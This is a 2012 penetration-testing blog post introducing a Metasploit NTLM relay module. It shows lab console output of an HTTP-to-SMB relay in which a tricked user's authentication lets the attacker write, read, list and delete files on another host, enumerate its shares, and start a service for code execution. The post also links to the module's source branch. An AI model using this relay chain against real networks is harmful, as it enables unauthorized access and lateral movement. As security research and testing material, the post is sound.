Cross-Protocol Chained Pass the Hash for Metasploit

Wednesday, August 29, 2012

Rob Fuller

D8853ae281be8cfdfa18ab73608e8c3f

Every so often someone writes a Metasploit Module that is pretty epic. July 12th was one such day:

Screen Shot 2012 07 10 at 1 53 15 AM

Twitter Link: https://twitter.com/webstersprodigy/status/222529916783169536

Which has a link to here: https://github.com/rapid7/metasploit-framework/pull/589

Demo / Example resource files: https://skydrive.live.com/?cid=19794fac33285fd5&resid=19794FAC33285FD5!170&id=19794FAC33285FD5%21170

You can pull the fork w/ branch from here: https://github.com/webstersprodigy/metasploit-framework/tree/module-http-ntlmrelay

And as soon as you do you can start doing this (using the example resource file to put a file, cat it out, enum shares available, list files on a share, then psexec all from a single URL being loaded):

163 address is the Victim I tricked into loading a URL and 182 is the system I want to get onto. This is an HTTP request resulting in a SMB Relay'd auth. It looks as though multiple targets can be used as relay targets but I haven't tested this out yet.

[*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_put' from 172.16.10.163:52327

[*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay...

[*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded

[*] 172.16.10.163 http_ntlmrelay - File \\172.16.10.182\c$\secret.txt written

[*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_get' from 172.16.10.163:52328

[*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay...

[*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded

[*] 172.16.10.163 http_ntlmrelay - Reading 13 bytes from 172.16.10.182

[*] 172.16.10.163 http_ntlmrelay - ----Contents----

[*] 172.16.10.163 http_ntlmrelay - hi ima secret

[*] 172.16.10.163 http_ntlmrelay - ----End Contents----

[*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_enum' from 172.16.10.163:52329

[*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay...

[*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded

[*] 172.16.10.163 http_ntlmrelay - Shares enumerated 172.16.10.182 IPC$ADMIN$C$

[*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_ls' from 172.16.10.163:52330

[*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay...

[*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded

[*] 172.16.10.163 http_ntlmrelay - Listed 13 files from 172.16.10.182\c$\

[*] 172.16.10.163 http_ntlmrelay - .rnd

[*] 172.16.10.163 http_ntlmrelay - PerfLogs

[*] 172.16.10.163 http_ntlmrelay - config.sys

[*] 172.16.10.163 http_ntlmrelay - inetpub

[*] 172.16.10.163 http_ntlmrelay - xampp

[*] 172.16.10.163 http_ntlmrelay - ProgramData

[*] 172.16.10.163 http_ntlmrelay - MSOCache

[*] 172.16.10.163 http_ntlmrelay - secret.txt

[*] 172.16.10.163 http_ntlmrelay - autoexec.bat

[*] 172.16.10.163 http_ntlmrelay - Windows

[*] 172.16.10.163 http_ntlmrelay - Users

[*] 172.16.10.163 http_ntlmrelay - Program Files

[*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_rm' from 172.16.10.163:52332

[*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay...

[*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded

[*] 172.16.10.163 http_ntlmrelay - File \\172.16.10.182\c$\secret.txt deleted

[*] 172.16.10.163 http_ntlmrelay - NTLM Request '/smb_pwn' from 172.16.10.163:52333

[*] 172.16.10.163 http_ntlmrelay - Beginning NTLM Relay...

[*] 172.16.10.163 http_ntlmrelay - SMB auth relay succeeded

[*] 172.16.10.163 http_ntlmrelay - Obtraining a service manager handle...

[*] 172.16.10.163 http_ntlmrelay - Creating a new service

[*] 172.16.10.163 http_ntlmrelay - Closing service handle...

[*] 172.16.10.163 http_ntlmrelay - Opening service...

[*] 172.16.10.163 http_ntlmrelay - Starting the service...

Let the fun begin...

Cross-posted from Room362

Possibly Related Articles:
14426
Network->General
Information Security
Hacking Tools Penetration Testing Metasploit Network Security Hashing Tutorial pentest
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.